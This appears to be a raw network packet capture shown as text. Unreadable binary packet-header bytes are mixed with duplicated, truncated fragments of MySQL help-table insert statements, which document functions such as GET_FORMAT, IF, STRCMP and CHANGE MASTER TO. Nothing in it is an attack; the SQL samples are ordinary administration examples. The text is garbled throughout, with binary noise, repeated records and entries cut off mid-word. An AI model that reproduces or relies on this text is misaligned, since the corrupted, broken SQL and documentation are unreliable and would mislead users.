ZZBi0`EL@/Ao0E4#|@?m  P:ԙ!`n e' SELECT CEILING(1.23);\n -> 2\nmysql> SELECT CEIL(-1.23);\n -> -1',''),(353,'SIN',4,' SIN(X)\nReturns the sine of X, where X is given in radians.\n','mysql> SELECT SIN(PI());\n -> 0.000000',''),(354,'DAYOFWEEK',14,' DAYOFWEEK(date)\nReturns the weekday index\nfor date (1 = Sunday, 2 = Monday, ..., 7 =\nSaturday). These index values correCQ ZZ0`BiEL@/go0AE4x@@ 3 PF't, )CQ bb0`BiET@/gրo0GE<@@/ 3 2P&ЙZ )C+Q ZZ0`BiEL@/܀o0SE4#|@@m  P:ԙ!`n e' SELECT 1 IS TRUE, 0 IS FALSE, NULL IS UNKNOWN;\n -> 1, 1, 1\nmysql> SELECT 1 IS NOT UNKNOWN, 0 IS NOT UNKNOWN, NULL IS NOT UNKNOWN;\n -> 1, 1, 0',''),(361,'GET_FORMAT',14,' GET_FORMAT(DATE|TIME|DATETIME, \'EUR\'|\'USA\'|\'JIS\'|\'ISO\'|\'INTERNAL\')\nReturns a format string. This function is useful in combination with the\nDATE_FORMAT() and the STR_TO_DATE() functions.\nThe three possible values for the first argument\nand the five possible values for the second argument result in 15 possible\nformat strings (for the specifiers used, see the table in the\nDATE_FORMAT() function description).\n Function Call Result\n GET_FORMAT(DATE,\'USA\') \'%m.%d.%Y\'\n GET_FORMAT(DATE,\'JIS\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'ISO\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'EUR\') \'%d.%m.%Y\'\n GET_FORMAT(DATE,\'INTERNAL\') \'%Y%m%d\'\n GET_FORMAT(DATETIME,\'USA\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'JIS\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'ISO\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'EUR\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'INTERNAL\') \'%Y%m%d%H%i%s\'\n GET_FORCU bb0`BiET@/Ԁo0SE SELECT 1 IS TRUE, 0 IS FALSE, NULL IS UNKNOWN;\n -> 1, 1, 1\nmysql> SELECT 1 IS NOT UNKNOWN, 0 IS NOT UNKNOWN, NULL IS NOT UNKNOWN;\n -> 1, 1, 0',''),(361,'GET_FORMAT',14,' GET_FORMAT(DATE|TIME|DATETIME, \'EUR\'|\'USA\'|\'JIS\'|\'ISO\'|\'INTERNAL\')\nReturns a format string. This function is useful in combination with the\nDATE_FORMAT() and the STR_TO_DATE() functions.\nThe three possible values for the first argument\nand the five possible values for the second argument result in 15 possible\nformat strings (for the specifiers used, see the table in the\nDATE_FORMAT() function description).\n Function Call Result\n GET_FORMAT(DATE,\'USA\') \'%m.%d.%Y\'\n GET_FORMAT(DATE,\'JIS\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'ISO\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'EUR\') \'%d.%m.%Y\'\n GET_FORMAT(DATE,\'INTERNAL\') \'%Y%m%d\'\n GET_FORMAT(DATETIME,\'USA\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'JIS\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'ISO\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'EUR\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'INTERNAL\') \'%Y%m%d%H%i%s\'\n GET_FORCW ZZBi0`EL@/܂Sŀo0E4z@? 3 PV't" )CW ZZ0`BiEL@/go0AE4z@@ 3 PV't" )CX ZZBiʪEL@/o0oo0E4@@@ #ܬ SELECT DATE_FORMAT(\'2003-10-03\',GET_FORMAT(DATE,\'EUR\'));\n -> \'03.10.2003\'\nmysql> SELECT STR_TO_DATE(\'10.31.2003\',GET_FORMAT(DATE,\'USA\'));\n -> 2003-10-31\n@c Following is commented out because not yet implemented\n@c mysql> SET DATE_FORMAT=GET_FORMAT(DATE, \'USA\'); SELECT \'2003-10-31\';\n@c -> 10-31-2003',''),(362,'TINYBLOB',1,' TINYBLOB\n\nA BLOB column with a maximum length of 255\n(2^8 - 1) bytes.\n','',''),(363,'SAVEPOINT',10,'SAVEPOINT identifier\nROLLBACK TO SAVEPOINT identifier\n\nStarting from MySQL 4.0.14 and 4.1.1, InnoDB supports the SQL statements\nSAVEPOINT and ROLLBACK TO SAVEPOINT.\n','',''),(364,'IF',9,' IF(expr1,expr2,expr3)\nIf expr1 is TRUE (expr1 <> 0 and expr1 <> NULL) then\nIF() returns expr2, else it returns expr3.\nIF() returns a numeric or string value, depending on the context\nin which it is used.\n','mysql> SELECT IF(1>2,2,3);\n CZ ZZBi0`EL@/Ao0E4#~@?k  P:ԙ!`Z e' SELECT DATE_FORMAT(\'2003-10-03\',GET_FORMAT(DATE,\'EUR\'));\n -> \'03.10.2003\'\nmysql> SELECT STR_TO_DATE(\'10.31.2003\',GET_FORMAT(DATE,\'USA\'));\n -> 2003-10-31\n@c Following is commented out because not yet implemented\n@c mysql> SET DATE_FORMAT=GET_FORMAT(DATE, \'USA\'); SELECT \'2003-10-31\';\n@c -> 10-31-2003',''),(362,'TINYBLOB',1,' TINYBLOB\n\nA BLOB column with a maximum length of 255\n(2^8 - 1) bytes.\n','',''),(363,'SAVEPOINT',10,'SAVEPOINT identifier\nROLLBACK TO SAVEPOINT identifier\n\nStarting from MySQL 4.0.14 and 4.1.1, InnoDB supports the SQL statements\nSAVEPOINT and ROLLBACK TO SAVEPOINT.\n','',''),(364,'IF',9,' IF(expr1,expr2,expr3)\nIf expr1 is TRUE (expr1 <> 0 and expr1 <> NULL) then\nIF() returns expr2, else it returns expr3.\nIF() returns a numeric or string value, depending on the context\nin which it is used.\n','mysql> SELECT IF(1>2,2,3);\n C8Z ZZ0`BiEL@/܀o0SE4#~@@k  P:ԙ!`Z e'ʈ r yxaG0 CTZ __0`BiEQ@/o0AE9r@@  P&:J>ʈ r yxaG0 Cc_ bbBi0`ET@/p܂Ao0E 3\nmysql> SELECT IF(1<2,\'yes\',\'no\');\n -> \'yes\'\nmysql> SELECT IF(STRCMP(\'test\',\'test1\'),\'no\',\'yes\');\n -> \'no\'',''),(365,'PURGE',6,'','PURGE MASTER LOGS TO \'mysql-bin.010\';\nPURGE MASTER LOGS BEFORE \'2003-04-02 22:46:26\';',''),(366,'USER',25,' USER()\n\nReturns the current MySQL username and hostname.\n','mysql> SELECT USER();\n -> \'davida@localhost\'',''),(367,'MPOINTFROMWKB',13,' MPointFromWKB(wkb[,srid])\n MultiPointFromWKB(wkb[,srid])\nConstructs a MULTIPOINT value using its WKB representation and SRID.\n','',''),(368,'ALTER TABLE',28,'ALTER TABLE allows you to change the structure of an existing table.\nFor example, you can add or delete columns, create or destroy indexes, change\nthe type of existing columns, or rename columns or the table itself. You can\nalso change the comment for the table and type of the table.\n','ALTER [IGNORE] TABLE tbl_name\n alter_specification [, alter_specification] ...\n\nalter_specification:\n ADD [COLUMN] column_definition [FIRST | AFTER col_name ]\n | ADD [COLUMN] (column_definition,...)\n | ADD INDEX [index_name] [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n PRIMARY KEY [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n Cm_ ZZBi0`EL@/Plo0E4r@?  P&:O>ʈ  yyaGC_ bb0`BiET@/Ԁo0SE 3\nmysql> SELECT IF(1<2,\'yes\',\'no\');\n -> \'yes\'\nmysql> SELECT IF(STRCMP(\'test\',\'test1\'),\'no\',\'yes\');\n -> \'no\'',''),(365,'PURGE',6,'','PURGE MASTER LOGS TO \'mysql-bin.010\';\nPURGE MASTER LOGS BEFORE \'2003-04-02 22:46:26\';',''),(366,'USER',25,' USER()\n\nReturns the current MySQL username and hostname.\n','mysql> SELECT USER();\n -> \'davida@localhost\'',''),(367,'MPOINTFROMWKB',13,' MPointFromWKB(wkb[,srid])\n MultiPointFromWKB(wkb[,srid])\nConstructs a MULTIPOINT value using its WKB representation and SRID.\n','',''),(368,'ALTER TABLE',28,'ALTER TABLE allows you to change the structure of an existing table.\nFor example, you can add or delete columns, create or destroy indexes, change\nthe type of existing columns, or rename columns or the table itself. You can\nalso change the comment for the table and type of the table.\n','ALTER [IGNORE] TABLE tbl_name\n alter_specification [, alter_specification] ...\n\nalter_specification:\n ADD [COLUMN] column_definition [FIRST | AFTER col_name ]\n | ADD [COLUMN] (column_definition,...)\n | ADD INDEX [index_name] [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n PRIMARY KEY [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n C_ ZZ0`BiEL@/o0AE4r@@  P&:O>ʈ  yyaGCVa ZZBi0`EL@/Ao0E4#@?i  P:ԙ!`G e' CREATE TABLE t1 (\n -> a INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n -> message CHAR(20));\nmysql> CREATE TABLE t2 (\n -> a INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n -> message CHAR(20));\nmysql> INSERT INTO t1 (message) VALUES (\'Testing\'),(\'table\'),(\'t1\');\nmysql> INSERT INTO t2 (message) VALUES (\'Testing\'),(\'table\'),(\'t2\');\nmysql> CREATE TABLE total (\n -> a INT NOT NULL AUTO_INCREMENT,\n -> message CHAR(20), INDEX(a))\n -> TYPE=MERGE UNION=(t1,t2) INSERT_METHOD=LAST;',''),(371,'CREATE TABLE',28,'CREATE TABLE creates a table with the given name.\nYou must have the CREATE privilege for the table.\n\nRules for allowable table names are given in [Legal names].\nBy default, the table is created in the current database.\nAn error occurs if the table exists, if there is no current database,\nor if the database does not exist.\n','CREATE [TEMPORARY] CGh bb0`BiET@/Ԁo0SE CREATE TABLE t1 (\n -> a INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n -> message CHAR(20));\nmysql> CREATE TABLE t2 (\n -> a INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n -> message CHAR(20));\nmysql> INSERT INTO t1 (message) VALUES (\'Testing\'),(\'table\'),(\'t1\');\nmysql> INSERT INTO t2 (message) VALUES (\'Testing\'),(\'table\'),(\'t2\');\nmysql> CREATE TABLE total (\n -> a INT NOT NULL AUTO_INCREMENT,\n -> message CHAR(20), INDEX(a))\n -> TYPE=MERGE UNION=(t1,t2) INSERT_METHOD=LAST;',''),(371,'CREATE TABLE',28,'CREATE TABLE creates a table with the given name.\nYou must have the CREATE privilege for the table.\n\nRules for allowable table names are given in [Legal names].\nBy default, the table is created in the current database.\nAn error occurs if the table exists, if there is no current database,\nor if the database does not exist.\n','CREATE [TEMPORARY] C%i ZZBi0`EL@/܂Sŀo0E4Sz@? 3 PtX09r )C>i ZZ0`BiEL@/go0AE4Sz@@ 3 PtX09r )Cj ZZBi0`EL@/Ao0E4#@?g  P:ԙÀ!`4 e'',26,' >\nGreater than:\n','mysql> SELECT 2 > 2;\n -> 0',''),(373,'MICROSECOND',14,' MICROSECOND(expr)\n\nReturns the microseconds from the time or datetime expression expr as a\nnumber in the range from 0 to 999999.\n','mysql> SELECT MICROSECOND(\'12:00:00.123456\');\n -> 123456\nmysql> SELECT MICROSECOND(\'1997-12-31 23:59:59.000010\');\n -> 10',''),(374,'ANALYZE',7,'This statement analyzes and stores the key distribution for a table.\nDuring the analysis, the table is locked with a read lock. This works on\nMyISAM and BDB tables and (as of MySQL 4.0.13) InnoDB\ntables. For MyISAM tables, this\nstatement is equivalent to using myisamchk -a.\n\nMySQL uses the stored key distribution to decide the order in which\ntables should be joined when you perform a join on something other than a\nconstant.\n','ANALYZE [LOCAL | NO_WRITE_TO_BINLOG] TABLE tbl_name [, tbl_name] ...',''),(375,'CONSTRAINT',7,'The syntax of a foreign key constraint definition in InnoDB looks like\nthis:\n\n[CONSTRAINT symbol] FOREIGN KEY [id] (index_col_name, ...)\n REFERENCES tbl_name (index_col_name, ...)\n [ON DELETE {RESTRICT | CASCADE | SET NULL | NO ACCl ZZBi0`EL@/Ao0E4,@?  oP K#, eqCl bb0`BiET@/Ԁo0SE',26,' >\nGreater than:\n','mysql> SELECT 2 > 2;\n -> 0',''),(373,'MICROSECOND',14,' MICROSECOND(expr)\n\nReturns the microseconds from the time or datetime expression expr as a\nnumber in the range from 0 to 999999.\n','mysql> SELECT MICROSECOND(\'12:00:00.123456\');\n -> 123456\nmysql> SELECT MICROSECOND(\'1997-12-31 23:59:59.000010\');\n -> 10',''),(374,'ANALYZE',7,'This statement analyzes and stores the key distribution for a table.\nDuring the analysis, the table is locked with a read lock. This works on\nMyISAM and BDB tables and (as of MySQL 4.0.13) InnoDB\ntables. For MyISAM tables, this\nstatement is equivalent to using myisamchk -a.\n\nMySQL uses the stored key distribution to decide the order in which\ntables should be joined when you perform a join on something other than a\nconstant.\n','ANALYZE [LOCAL | NO_WRITE_TO_BINLOG] TABLE tbl_name [, tbl_name] ...',''),(375,'CONSTRAINT',7,'The syntax of a foreign key constraint definition in InnoDB looks like\nthis:\n\n[CONSTRAINT symbol] FOREIGN KEY [id] (index_col_name, ...)\n REFERENCES tbl_name (index_col_name, ...)\n [ON DELETE {RESTRICT | CASCADE | SET NULL | NO ACCl ZZ0`BiEL@/o0a<E4,@@  oP K#, eqCr ZZBi0`EL@/܂Sŀo0E4|@? 3 Pf't )Cs ZZ0`BiEL@/go0AE4|@@ 3 Pf't )Ct bbBi0`ET@/p܂Ao0E<6@?  3P#   )sring result.\n','mysql> SELECT AsText(g) FROM geom;\n+-------------------------+\n| AsText(p1) |\n+-------------------------+\n| POINT(1 1) |\n| LINESTRING(0 0,1 1,2 2) |\n+-------------------------+',''),(142,'LPAD',23,' LPAD(str,len,padstr)\nReturns the string str, left-padded with the string padstr\nto a length of len characters. If str is longer\nthan len, the return value is shortened to len characters.\n','mysql> SELECT LPAD(\'hi\',4,\'??\');\n -> \'??hi\'\nmysql> SELECT LPAD(\'hi\',1,\'??\');\n -> \'h\'',''),(143,'OVERLAPS',11,' Overlaps(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially overlaps\ng2.\nThe term /spatially overlaps/ is used if two\ngeometries intersect and their intersection results in a geometry of the\nsame dimension but not equal to either of the given geometries.\n','',''),(144,'NUMGEOMETRIES',5,' NumGeometries(gc)\nReturns the number of geometries in the GeometryCollection value\ngc.\n','mysql> SET @gc = \'GeometryCollection(Point(1 1),LineString(2 2, 3 3))\';\nmysql> SELECT NumGeometries(GeomFromText(@gc));\n+----------------------------------+\n| NumGeometries(GeomFromText(@gc)) |\n+----------------------------------+\n| 2 |\n+------------------------Ct ZZBi0`EL@/Ao0E4#@?e  P:ԙӀ!`  e' SELECT AsText(g) FROM geom;\n+-------------------------+\n| AsText(p1) |\n+-------------------------+\n| POINT(1 1) |\n| LINESTRING(0 0,1 1,2 2) |\n+-------------------------+',''),(142,'LPAD',23,' LPAD(str,len,padstr)\nReturns the string str, left-padded with the string padstr\nto a length of len characters. If str is longer\nthan len, the return value is shortened to len characters.\n','mysql> SELECT LPAD(\'hi\',4,\'??\');\n -> \'??hi\'\nmysql> SELECT LPAD(\'hi\',1,\'??\');\n -> \'h\'',''),(143,'OVERLAPS',11,' Overlaps(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially overlaps\ng2.\nThe term /spatially overlaps/ is used if two\ngeometries intersect and their intersection results in a geometry of the\nsame dimension but not equal to either of the given geometries.\n','',''),(144,'NUMGEOMETRIES',5,' NumGeometries(gc)\nReturns the number of geometries in the GeometryCollection value\ngc.\n','mysql> SET @gc = \'GeometryCollection(Point(1 1),LineString(2 2, 3 3))\';\nmysql> SELECT NumGeometries(GeomFromText(@gc));\n+----------------------------------+\n| NumGeometries(GeomFromText(@gc)) |\n+----------------------------------+\n| 2 |\n+------------------------Cu ZZ0`BiEL@/܀o0SE4#@@e  P:ԙӀ!`  e' SELECT MONTHNAME(\'1998-02-05\');\n -> \'February\'',''),(147,'MBREQUAL',8,' MBREqual(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 are the same.\n','',''),(148,'CHANGE MASTER TO',6,'\nCHANGE MASTER TO master_def [, master_def] ...\n\nmaster_def:\n MASTER_HOST = \'host_name\'\n | MASTER_USER = \'user_name\'\n | MASTER_PASSWORD = \'password\'\n | MASTER_PORT = port_num\n | MASTER_CONNECT_RETRY = count\n | MASTER_LOG_FILE = \'master_log_name\'\n | MASTER_LOG_POS = master_log_pos\n | RELAY_LOG_FILE = \'relay_log_name\'\n | RELAY_LOG_POS = relay_log_pos\n | MASTER_SSL = {0|1}\n | MASTER_SSL_CA = \'ca_file_name\'\n | MASTER_SSL_CAPATH = \'ca_directory_name\'\n | MASTER_SC[y bb0`BiET@/Ԁo0SE<6@@  3P+ S  )s----------+',''),(145,'SET GLOBAL SQL_SLAVE_SKIP_COUNTER',7,'SET GLOBAL SQL_SLAVE_SKIP_COUNTER = n\n\nSkip the next n events from the master. This is\nuseful for recovering from replication stops caused by a statement.\n\nThis statement is valid only when the slave thread is not running.\nOtherwise, it produces an error.\n\nBefore MySQL 4.0, omit the GLOBAL keyword from the statement.\n','',''),(146,'MONTHNAME',14,' MONTHNAME(date)\nReturns the full name of the month for date.\n','mysql> SELECT MONTHNAME(\'1998-02-05\');\n -> \'February\'',''),(147,'MBREQUAL',8,' MBREqual(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 are the same.\n','',''),(148,'CHANGE MASTER TO',6,'\nCHANGE MASTER TO master_def [, master_def] ...\n\nmaster_def:\n MASTER_HOST = \'host_name\'\n | MASTER_USER = \'user_name\'\n | MASTER_PASSWORD = \'password\'\n | MASTER_PORT = port_num\n | MASTER_CONNECT_RETRY = count\n | MASTER_LOG_FILE = \'master_log_name\'\n | MASTER_LOG_POS = master_log_pos\n | RELAY_LOG_FILE = \'relay_log_name\'\n | RELAY_LOG_POS = relay_log_pos\n | MASTER_SSL = {0|1}\n | MASTER_SSL_CA = \'ca_file_name\'\n | MASTER_SSL_CAPATH = \'ca_directory_name\'\n | MASTER_SC!~ bbBi0`ET@/p܂Ao0E<6@?  3P3   )sSL_CERT = \'cert_file_name\'\n | MASTER_SSL_KEY = \'key_file_name\'\n | MASTER_SSL_CIPHER = \'cipher_list\'\n\nChanges the parameters that the slave server uses for connecting to and\ncommunicating with the master server.\n\nMASTER_USER, MASTER_PASSWORD, MASTER_SSL,\nMASTER_SSL_CA, MASTER_SSL_CAPATH, MASTER_SSL_CERT,\nMASTER_SSL_KEY, and MASTER_SSL_CIPHER provide information for\nthe slave about how to connect to its master.\n\nThe relay log options (RELAY_LOG_FILE and RELAY_LOG_POS) are\navailable beginning with MySQL 4.0.\n\nThe SSL options\n(MASTER_SSL,\nMASTER_SSL_CA,\nMASTER_SSL_CAPATH,\nMASTER_SSL_CERT,\nMASTER_SSL_KEY,\nand\nMASTER_SSL_CIPHER)\nare available beginning with MySQL 4.1.1.\nYou can change these options even on slaves that are compiled without SSL\nsupport. They are saved to the *master.info file, but are ignored\nuntil you use a server that has SSL support enabled.\n\nIf you don\'t specify a given parameter, it keeps its old\nvalue, except as indicated in the following discussion. For example, if the password to connect to your MySQL master has\nchanged, you just need to issue these statements\nto tell the slave about the new password:\n\nmysql> STOP SLAVE; -- if replication was running\nmysql> CHANGE MASTER TO MASTER_PASSWORD=\'new3cret\';\nC+~ ZZBi0`EL@/Ao0E4#@?c  P:ԙ!` e' STOP SLAVE; -- if replication was running\nmysql> CHANGE MASTER TO MASTER_PASSWORD=\'new3cret\';\nCV~ ZZ0`BiEL@/܀o0SE4#@@c  P:ԙ!` e' START SLAVE; -- if you want to restart replication\n\nThere is no need to specify the parameters that do\nnot change (host, port, user, and so forth).\n\nMASTER_HOST and MASTER_PORT are the hostname (or IP address) of\nthe master host and its TCP/IP port. Note that if MASTER_HOST is\nequal to localhost, then, like in other parts of MySQL, the port\nmay be ignored (if Unix socket files can be used, for example).\n\nIf you specify MASTER_HOST or MASTER_PORT,\nthe slave assumes that the master server is different than\nbefore (even if you specify a host or port value that is\nthe same as the current value.) In this case, the old values for the master\nbinary log name and position are considered no longer applicable, so if you\ndo not specify MASTER_LOG_FILE and MASTER_LOG_POS in the\nstatement, MASTER_LOG_FILE=\'\' and MASTER_LOG_POS=4 are\nsilently appended to it.\n\nMASTER_LOG_FILE and MASTER_LOG_POS are the coordinates\nat which the slave I/O thread should begin reading from the master the\nnext time the thread starts.\nIf you specify either of them, you can\'t specify RELAY_LOG_FILE or\nRELAY_LOG_POS.\nIf neither of MASTER_LOG_FILE or MASTER_LOG_POS are\nspecified, the slave uses the last coordinates of the /slave SQL thread/\nbefore CHANGE MASTER was issued. C bb0`BiET@/Ԁo0SE<6@@  3P ; z  )smysql> START SLAVE; -- if you want to restart replication\n\nThere is no need to specify the parameters that do\nnot change (host, port, user, and so forth).\n\nMASTER_HOST and MASTER_PORT are the hostname (or IP address) of\nthe master host and its TCP/IP port. Note that if MASTER_HOST is\nequal to localhost, then, like in other parts of MySQL, the port\nmay be ignored (if Unix socket files can be used, for example).\n\nIf you specify MASTER_HOST or MASTER_PORT,\nthe slave assumes that the master server is different than\nbefore (even if you specify a host or port value that is\nthe same as the current value.) In this case, the old values for the master\nbinary log name and position are considered no longer applicable, so if you\ndo not specify MASTER_LOG_FILE and MASTER_LOG_POS in the\nstatement, MASTER_LOG_FILE=\'\' and MASTER_LOG_POS=4 are\nsilently appended to it.\n\nMASTER_LOG_FILE and MASTER_LOG_POS are the coordinates\nat which the slave I/O thread should begin reading from the master the\nnext time the thread starts.\nIf you specify either of them, you can\'t specify RELAY_LOG_FILE or\nRELAY_LOG_POS.\nIf neither of MASTER_LOG_FILE or MASTER_LOG_POS are\nspecified, the slave uses the last coordinates of the /slave SQL thread/\nbefore CHANGE MASTER was issued. Cn ZZBi0`EL@/Ao0E4#@?a  P:ԙ!` e' SELECT FIELD(\'ej\', \'Hej\', \'ej\', \'Heja\', \'hej\', \'foo\');\n -> 2\nmysql> SELECT FIELD(\'fo\', \'Hej\', \'ej\', \'Heja\', \'hej\', \'foo\');\n -> 0',''),(377,'MAKETIME',14,' MAKETIME(hour,minute,second)\n\nReturns a time value calculated from the hour, minute, and\nsecond arguments.\n','mysql> SELECT MAKETIME(12,15,30);\n -> \'12:15:30\'',''),(378,'CURDATE',14,' CURDATE()\n\nReturns the current date as a value in \'YYYY-MM-DD\' or YYYYMMDD\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT CURDATE();\n -> \'1997-12-15\'\nmysql> SELECT CURDATE() + 0;\n -> 19971215',''),(379,'MIN MAX',12,' MIN([DISTINCT] expr)\n MAX([DISTINCT] expr)\nReturns the minimum or maximum value of expr. MIN() and\nMAX() may take a string argument; in such cases they return the\nminimum or maximum string value. See also : [MySQL indexes].\nThe DISTINCT keyword can be used as of MySQL 5.0.0 to find the minimum\nor maximum of the distinct values of expr; this is supported, but\nproduces the same result as omittinCM ZZBi0`EL@/܂Sŀo0E4@? 3 P%'t )Cf bb0`BiET@/Ԁo0SE SELECT FIELD(\'ej\', \'Hej\', \'ej\', \'Heja\', \'hej\', \'foo\');\n -> 2\nmysql> SELECT FIELD(\'fo\', \'Hej\', \'ej\', \'Heja\', \'hej\', \'foo\');\n -> 0',''),(377,'MAKETIME',14,' MAKETIME(hour,minute,second)\n\nReturns a time value calculated from the hour, minute, and\nsecond arguments.\n','mysql> SELECT MAKETIME(12,15,30);\n -> \'12:15:30\'',''),(378,'CURDATE',14,' CURDATE()\n\nReturns the current date as a value in \'YYYY-MM-DD\' or YYYYMMDD\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT CURDATE();\n -> \'1997-12-15\'\nmysql> SELECT CURDATE() + 0;\n -> 19971215',''),(379,'MIN MAX',12,' MIN([DISTINCT] expr)\n MAX([DISTINCT] expr)\nReturns the minimum or maximum value of expr. MIN() and\nMAX() may take a string argument; in such cases they return the\nminimum or maximum string value. See also : [MySQL indexes].\nThe DISTINCT keyword can be used as of MySQL 5.0.0 to find the minimum\nor maximum of the distinct values of expr; this is supported, but\nproduces the same result as omittinCw ZZ0`BiEL@/go0AE4@@ 3 P%'t )C7 ZZBi0`EL@/Ao0E4#@?_  P:ԙ!` e' SELECT student_name, MIN(test_score), MAX(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(380,'SET PASSWORD',7,'','SET PASSWORD = PASSWORD(\'some password\')\nSET PASSWORD FOR user = PASSWORD(\'some password\')',''),(381,'ENUM',1,' ENUM(\'value1\',\'value2\',...)\n\nAn enumeration. A string object that can have only one value, chosen\nfrom the list of values \'value1\', \'value2\', ...,\nNULL or the special \'\' error value. An ENUM column can\nhave a maximum of 65,535 distinct values.\nENUM values are represented internally as integers.\n','',''),(382,'DATABASE',25,' DATABASE()\nReturns the default (current) database name.\nAs of MySQL 4.1, the string has the utf8 character set.\n','mysql> SELECT DATABASE();\n -> \'test\'',''),(383,'POINTFROMWKB',13,' PointFromWKB(wkb[,srid])\nConstructs a POINT value using its WKB representation and SRID.\n','',''),(384,'POWER',4,' POW(X,Y)\n POWER(X,Y)\nReturns the value of X raised to the power of Y.\n','mysql> SELECT POW(2,2);\n -> 4.000000\nmysql> SELECT POW(2,-2);\n -> 0.250000',''),(385,'ATAN',4,' ATAN(X)\nReturns the arc tangent of X, that is, the value whose tangent is\nX.\n','mysql> SELECT ATAN(2);\n -> 1.107149\nmysql> SELECE bb0`BiET@/Ԁo0SE SELECT student_name, MIN(test_score), MAX(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(380,'SET PASSWORD',7,'','SET PASSWORD = PASSWORD(\'some password\')\nSET PASSWORD FOR user = PASSWORD(\'some password\')',''),(381,'ENUM',1,' ENUM(\'value1\',\'value2\',...)\n\nAn enumeration. A string object that can have only one value, chosen\nfrom the list of values \'value1\', \'value2\', ...,\nNULL or the special \'\' error value. An ENUM column can\nhave a maximum of 65,535 distinct values.\nENUM values are represented internally as integers.\n','',''),(382,'DATABASE',25,' DATABASE()\nReturns the default (current) database name.\nAs of MySQL 4.1, the string has the utf8 character set.\n','mysql> SELECT DATABASE();\n -> \'test\'',''),(383,'POINTFROMWKB',13,' PointFromWKB(wkb[,srid])\nConstructs a POINT value using its WKB representation and SRID.\n','',''),(384,'POWER',4,' POW(X,Y)\n POWER(X,Y)\nReturns the value of X raised to the power of Y.\n','mysql> SELECT POW(2,2);\n -> 4.000000\nmysql> SELECT POW(2,-2);\n -> 0.250000',''),(385,'ATAN',4,' ATAN(X)\nReturns the arc tangent of X, that is, the value whose tangent is\nX.\n','mysql> SELECT ATAN(2);\n -> 1.107149\nmysql> SELEC bbBi0`ET@/p܂Ao0E -1.107149',''),(386,'STRCMP',23,' STRCMP(expr1,expr2)\nSTRCMP()\nreturns 0 if the strings are the same, -1 if the first\nargument is smaller than the second according to the current sort order,\nand 1 otherwise.\n','mysql> SELECT STRCMP(\'text\', \'text2\');\n -> -1\nmysql> SELECT STRCMP(\'text2\', \'text\');\n -> 1\nmysql> SELECT STRCMP(\'text\', \'text\');\n -> 0',''),(387,'INSERT DELAYED',6,'The DELAYED option for the INSERT statement is a\nMySQL extension to standard SQL that is very useful if you have clients\nthat can\'t wait for the INSERT to complete. This is a common\nproblem when you use MySQL for logging and you also\nperiodically run SELECT and UPDATE statements that take a\nlong time to complete. DELAYED was introduced in MySQL\n3.22.15.\n\nWhen a client uses INSERT DELAYED, it gets an okay from the server at\nonce, and the row is queued to be inserted when the table is not in use by\nany other thread.\n\nAnother major benefit of using INSERT DELAYED is that inserts\nfrom many clients are bundled together and written in one block. This is much\nfaster than doing many separate inserts.\n\nThere are some constraints on the use of DELAYED:\n\n\n --- INSERT DELAYED works only with ISAM, MyISAM, and (beginning\C bb0`BiET@/Ԁo0SE -1.107149',''),(386,'STRCMP',23,' STRCMP(expr1,expr2)\nSTRCMP()\nreturns 0 if the strings are the same, -1 if the first\nargument is smaller than the second according to the current sort order,\nand 1 otherwise.\n','mysql> SELECT STRCMP(\'text\', \'text2\');\n -> -1\nmysql> SELECT STRCMP(\'text2\', \'text\');\n -> 1\nmysql> SELECT STRCMP(\'text\', \'text\');\n -> 0',''),(387,'INSERT DELAYED',6,'The DELAYED option for the INSERT statement is a\nMySQL extension to standard SQL that is very useful if you have clients\nthat can\'t wait for the INSERT to complete. This is a common\nproblem when you use MySQL for logging and you also\nperiodically run SELECT and UPDATE statements that take a\nlong time to complete. DELAYED was introduced in MySQL\n3.22.15.\n\nWhen a client uses INSERT DELAYED, it gets an okay from the server at\nonce, and the row is queued to be inserted when the table is not in use by\nany other thread.\n\nAnother major benefit of using INSERT DELAYED is that inserts\nfrom many clients are bundled together and written in one block. This is much\nfaster than doing many separate inserts.\n\nThere are some constraints on the use of DELAYED:\n\n\n --- INSERT DELAYED works only with ISAM, MyISAM, and (beginning\C ZZBi0`EL@/< o0E4 @?  gPa8Z ; _C ZZ0`BiEL@/o0  E4 @@  gPa8Z ; _C ZZBi0`EL@/Ao0E4#@?]  P:ԙ!` e' SELECT LN(Cy ZZBi0`EL@/܂Sŀo0E4@? 3 P/'t )C bb0`BiET@/Ԁo0SE SELECT LN(C ZZ0`BiEL@/go0AE4@@ 3 P/'t )CP bbBi0`ET@/p܂Ao0E 0.693147\nmysql> SELECT LN(-2);\n -> NULL',''),(390,'LOG',4,' LOG(X)\n LOG(B,X)\nIf called with one parameter, this function returns the natural logarithm\nof X.\n','mysql> SELECT LOG(2);\n -> 0.693147\nmysql> SELECT LOG(-2);\n -> NULL',''),(391,'SET SQL_LOG_BIN',6,'SET 